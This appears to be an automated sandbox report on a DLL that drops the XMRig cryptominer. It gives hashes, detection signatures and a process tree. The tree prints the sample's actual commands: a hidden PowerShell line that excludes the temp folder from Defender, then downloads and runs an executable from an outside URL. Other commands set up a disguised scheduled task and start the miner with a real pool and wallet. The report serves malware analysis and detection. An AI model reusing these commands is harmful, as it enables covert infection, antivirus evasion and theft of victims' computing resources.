Analysis
-
max time kernel
99s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
02/08/2023, 08:19
Static task
static1
Behavioral task
behavioral1
Sample
bf2f2ff6aeba535928b65cbfd3890dd3.dll
Resource
win7-20230712-en
General
-
Target
bf2f2ff6aeba535928b65cbfd3890dd3.dll
-
Size
103KB
-
MD5
bf2f2ff6aeba535928b65cbfd3890dd3
-
SHA1
c53534801af64bd6c3e74d33d7a84163271602e2
-
SHA256
5c8cda2e3762ca39fdc3479693ec0bb7fe1ab6a8c9d650b699ca63f5c27689c5
-
SHA512
cfce2f1d33eb798e8cd68cbfd929dce2df706c8ff3f1c4da859009101bd3054423c8c91ab6e366978ee450ad9c45502d8248e96d6b5522b63d63f4e793fdb919
-
SSDEEP
3072:EMVz9PYVkoLvIkqUjZdJB8rVYPbwIgtDzy7URPlxu:EMbPYVkockqkZH2/Flxu
Malware Config
Signatures
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/files/0x000600000002309b-219.dat family_xmrig behavioral2/files/0x000600000002309b-219.dat xmrig behavioral2/files/0x000600000002309b-220.dat family_xmrig behavioral2/files/0x000600000002309b-220.dat xmrig behavioral2/memory/1204-237-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-244-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-264-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-281-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-299-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-316-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-338-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-380-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-406-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-422-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig behavioral2/memory/1204-439-0x00007FF71AE80000-0x00007FF71B97E000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 12 2208 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 2840 2.exe 1204 temp_file.bin 3376 2.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3480 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3680 wmic.exe -
Enumerates processes with tasklist 1 TTPs 64 IoCs
pid Process 3884 tasklist.exe 5044 tasklist.exe 1468 tasklist.exe 4852 tasklist.exe 820 tasklist.exe 5080 tasklist.exe 2476 tasklist.exe 4328 tasklist.exe 3104 tasklist.exe 816 tasklist.exe 1008 tasklist.exe 4436 tasklist.exe 2396 tasklist.exe 2680 tasklist.exe 1468 tasklist.exe 628 tasklist.exe 4676 tasklist.exe 4744 tasklist.exe 2968 tasklist.exe 1844 tasklist.exe 4464 tasklist.exe 3888 tasklist.exe 4036 tasklist.exe 3836 tasklist.exe 4664 tasklist.exe 4216 tasklist.exe 4196 tasklist.exe 4224 tasklist.exe 1960 tasklist.exe 4968 tasklist.exe 4736 tasklist.exe 1984 tasklist.exe 5040 tasklist.exe 440 tasklist.exe 4424 tasklist.exe 1596 tasklist.exe 1452 tasklist.exe 4544 tasklist.exe 8 tasklist.exe 4996 tasklist.exe 5036 tasklist.exe 1244 tasklist.exe 2392 tasklist.exe 3924 tasklist.exe 2584 tasklist.exe 2176 tasklist.exe 4196 tasklist.exe 3672 tasklist.exe 4800 tasklist.exe 3112 tasklist.exe 3312 tasklist.exe 4560 tasklist.exe 3496 tasklist.exe 4948 tasklist.exe 2964 tasklist.exe 3864 tasklist.exe 3100 tasklist.exe 2092 tasklist.exe 1776 tasklist.exe 4116 tasklist.exe 4784 tasklist.exe 5004 tasklist.exe 640 tasklist.exe 1292 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2208 powershell.exe 2208 powershell.exe 4728 powershell.exe 4728 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeIncreaseQuotaPrivilege 3680 wmic.exe Token: SeSecurityPrivilege 3680 wmic.exe Token: SeTakeOwnershipPrivilege 3680 wmic.exe Token: SeLoadDriverPrivilege 3680 wmic.exe Token: SeSystemProfilePrivilege 3680 wmic.exe Token: SeSystemtimePrivilege 3680 wmic.exe Token: SeProfSingleProcessPrivilege 3680 wmic.exe Token: SeIncBasePriorityPrivilege 3680 wmic.exe Token: SeCreatePagefilePrivilege 3680 wmic.exe Token: SeBackupPrivilege 3680 wmic.exe Token: SeRestorePrivilege 3680 wmic.exe Token: SeShutdownPrivilege 3680 wmic.exe Token: SeDebugPrivilege 3680 wmic.exe Token: SeSystemEnvironmentPrivilege 3680 wmic.exe Token: SeRemoteShutdownPrivilege 3680 wmic.exe Token: SeUndockPrivilege 3680 wmic.exe Token: SeManageVolumePrivilege 3680 wmic.exe Token: 33 3680 wmic.exe Token: 34 3680 wmic.exe Token: 35 3680 wmic.exe Token: 36 3680 wmic.exe Token: SeIncreaseQuotaPrivilege 3680 wmic.exe Token: SeSecurityPrivilege 3680 wmic.exe Token: SeTakeOwnershipPrivilege 3680 wmic.exe Token: SeLoadDriverPrivilege 3680 wmic.exe Token: SeSystemProfilePrivilege 3680 wmic.exe Token: SeSystemtimePrivilege 3680 wmic.exe Token: SeProfSingleProcessPrivilege 3680 wmic.exe Token: SeIncBasePriorityPrivilege 3680 wmic.exe Token: SeCreatePagefilePrivilege 3680 wmic.exe Token: SeBackupPrivilege 3680 wmic.exe Token: SeRestorePrivilege 3680 wmic.exe Token: SeShutdownPrivilege 3680 wmic.exe Token: SeDebugPrivilege 3680 wmic.exe Token: SeSystemEnvironmentPrivilege 3680 wmic.exe Token: SeRemoteShutdownPrivilege 3680 wmic.exe Token: SeUndockPrivilege 3680 wmic.exe Token: SeManageVolumePrivilege 3680 wmic.exe Token: 33 3680 wmic.exe Token: 34 3680 wmic.exe Token: 35 3680 wmic.exe Token: 36 3680 wmic.exe Token: SeIncreaseQuotaPrivilege 3704 wmic.exe Token: SeSecurityPrivilege 3704 wmic.exe Token: SeTakeOwnershipPrivilege 3704 wmic.exe Token: SeLoadDriverPrivilege 3704 wmic.exe Token: SeSystemProfilePrivilege 3704 wmic.exe Token: SeSystemtimePrivilege 3704 wmic.exe Token: SeProfSingleProcessPrivilege 3704 wmic.exe Token: SeIncBasePriorityPrivilege 3704 wmic.exe Token: SeCreatePagefilePrivilege 3704 wmic.exe Token: SeBackupPrivilege 3704 wmic.exe Token: SeRestorePrivilege 3704 wmic.exe Token: SeShutdownPrivilege 3704 wmic.exe Token: SeDebugPrivilege 3704 wmic.exe Token: SeSystemEnvironmentPrivilege 3704 wmic.exe Token: SeRemoteShutdownPrivilege 3704 wmic.exe Token: SeUndockPrivilege 3704 wmic.exe Token: SeManageVolumePrivilege 3704 wmic.exe Token: 33 3704 wmic.exe Token: 34 3704 wmic.exe Token: 35 3704 wmic.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1204 temp_file.bin -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1960 wrote to memory of 2208 1960 rundll32.exe 85 PID 1960 wrote to memory of 2208 1960 rundll32.exe 85 PID 2208 wrote to memory of 2840 2208 powershell.exe 95 PID 2208 wrote to memory of 2840 2208 powershell.exe 95 PID 2208 wrote to memory of 2840 2208 powershell.exe 95 PID 2840 wrote to memory of 4728 2840 2.exe 96 PID 2840 wrote to memory of 4728 2840 2.exe 96 PID 2840 wrote to memory of 4728 2840 2.exe 96 PID 2840 wrote to memory of 2320 2840 2.exe 139 PID 2840 wrote to memory of 2320 2840 2.exe 139 PID 2840 wrote to memory of 2320 2840 2.exe 139 PID 2840 wrote to memory of 3680 2840 2.exe 100 PID 2840 wrote to memory of 3680 2840 2.exe 100 PID 2840 wrote to memory of 3680 2840 2.exe 100 PID 2320 wrote to memory of 3480 2320 Conhost.exe 102 PID 2320 wrote to memory of 3480 2320 Conhost.exe 102 PID 2320 wrote to memory of 3480 2320 Conhost.exe 102 PID 2840 wrote to memory of 1624 2840 2.exe 104 PID 2840 wrote to memory of 1624 2840 2.exe 104 PID 2840 wrote to memory of 1624 2840 2.exe 104 PID 2840 wrote to memory of 3704 2840 2.exe 106 PID 2840 wrote to memory of 3704 2840 2.exe 106 PID 2840 wrote to memory of 3704 2840 2.exe 106 PID 2840 wrote to memory of 1116 2840 2.exe 108 PID 2840 wrote to memory of 1116 2840 2.exe 108 PID 2840 wrote to memory of 1116 2840 2.exe 108 PID 2840 wrote to memory of 4512 2840 2.exe 110 PID 2840 wrote to memory of 4512 2840 2.exe 110 PID 2840 wrote to memory of 4512 2840 2.exe 110 PID 2840 wrote to memory of 5080 2840 2.exe 112 PID 2840 wrote to memory of 5080 2840 2.exe 112 PID 2840 wrote to memory of 5080 2840 2.exe 112 PID 2840 wrote to memory of 1960 2840 2.exe 114 PID 2840 wrote to memory of 1960 2840 2.exe 114 PID 2840 wrote to memory of 1960 2840 2.exe 114 PID 2840 wrote to memory of 4760 2840 2.exe 116 PID 2840 wrote to memory of 4760 2840 2.exe 116 PID 2840 wrote to memory of 4760 2840 2.exe 116 PID 2840 wrote to memory of 2092 2840 2.exe 118 PID 2840 wrote to memory of 2092 2840 2.exe 118 PID 2840 wrote to memory of 2092 2840 2.exe 118 PID 2840 wrote to memory of 644 2840 2.exe 120 PID 2840 wrote to memory of 644 2840 2.exe 120 PID 2840 wrote to memory of 644 2840 2.exe 120 PID 644 wrote to memory of 1204 644 cmd.exe 122 PID 644 wrote to memory of 1204 644 cmd.exe 122 PID 2840 wrote to memory of 2088 2840 2.exe 124 PID 2840 wrote to memory of 2088 2840 2.exe 124 PID 2840 wrote to memory of 2088 2840 2.exe 124 PID 2840 wrote to memory of 3552 2840 2.exe 126 PID 2840 wrote to memory of 3552 2840 2.exe 126 PID 2840 wrote to memory of 3552 2840 2.exe 126 PID 2840 wrote to memory of 1156 2840 2.exe 128 PID 2840 wrote to memory of 1156 2840 2.exe 128 PID 2840 wrote to memory of 1156 2840 2.exe 128 PID 2840 wrote to memory of 2476 2840 2.exe 130 PID 2840 wrote to memory of 2476 2840 2.exe 130 PID 2840 wrote to memory of 2476 2840 2.exe 130 PID 2840 wrote to memory of 4968 2840 2.exe 133 PID 2840 wrote to memory of 4968 2840 2.exe 133 PID 2840 wrote to memory of 4968 2840 2.exe 133 PID 2840 wrote to memory of 4620 2840 2.exe 134 PID 2840 wrote to memory of 4620 2840 2.exe 134 PID 2840 wrote to memory of 4620 2840 2.exe 134
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\bf2f2ff6aeba535928b65cbfd3890dd3.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command Add-MpPreference -ExclusionPath "$env:TEMP "; Invoke-WebRequest -Uri "https://abumachin.000webhostapp.com/files/32123212.xfx" -OutFile $env:TEMP"\2.exe"; Start-Process -FilePath $env:TEMP"\2.exe";2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\Temp\\\""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\2.exe /F4⤵PID:2320
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\2.exe /F5⤵
- Creates scheduled task(s)
PID:3480
-
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\tar.exe"tar" -xf C:\Users\Admin\AppData\Local\Temp\1.rar -C C:\Users\Admin\AppData\Local\Temp\4⤵PID:1624
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1116
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4512
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:5080
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1960
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4760
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2092
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\temp_file.bin --opencl --cuda -o pool.hashvault.pro:443 -u 45mDAY563ufNVW7uoJfQ3CdJGnvaR5Vr5XnTtZszgEt63dyuvagd43fMBgUAFWadLF4wgnX8eS5Z6H77tCuzmE8y7w2XE9h -p x -k --tls --max-cpu-usage=404⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Users\Admin\AppData\Local\Temp\temp_file.binC:\Users\Admin\AppData\Local\Temp\temp_file.bin --opencl --cuda -o pool.hashvault.pro:443 -u 45mDAY563ufNVW7uoJfQ3CdJGnvaR5Vr5XnTtZszgEt63dyuvagd43fMBgUAFWadLF4wgnX8eS5Z6H77tCuzmE8y7w2XE9h -p x -k --tls --max-cpu-usage=405⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1204
-
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2088
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3552
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1156
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2476
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4968
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4620
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1776
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1984
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of WriteProcessMemory
PID:2320
-
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3804
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4116
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4328
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4736
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3880
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4464
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3352
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1376
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:5040
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3884
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3496
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1388
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4948
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4792
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1468
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4664
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:944
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:628
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4748
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4676
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4680
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2796
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1244
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4036
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2964
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4512
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4356
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4996
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:224
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1184
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3112
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:5044
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2088
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4600
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4172
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3864
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1468
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3472
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3836
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:816
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1984
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1364
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3876
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4756
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3044
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3948
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2184
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2156
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3312
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2916
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1728
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4216
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3100
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4852
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3340
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4560
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1540
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3016
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4772
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4664
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3836
-
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:816
-
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1984
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4676
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2968
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4328
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4428
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3424
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:216
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1596
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1008
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:440
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:764
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:408
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:656
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1832
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1452
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4948
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4436
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1540
-
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2200
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4620
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:404
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2584
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:1844
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3428
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:8
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:820
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2176
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:5068
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4212
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:848
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2824
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1416
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1736
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1184
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3288
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:652
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:856
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3300
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4808
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3120
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4668
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2396
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4544
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3688
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2524
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1440
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2796
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:8
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3076
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3424
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4196
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2516
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:440
-
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2348
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1184
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4784
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:5004
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4548
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1688
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2860
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:5116
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4464
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4680
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:640
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4252
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:2316
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:608
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:984
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4196
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:5080
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3924
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1736
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:4132
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:2680
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3672
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:944
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4424
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3996
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:5108
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:8
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:3076
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:492
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1964
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:3888
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
PID:4744
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"4⤵PID:1368
-
-
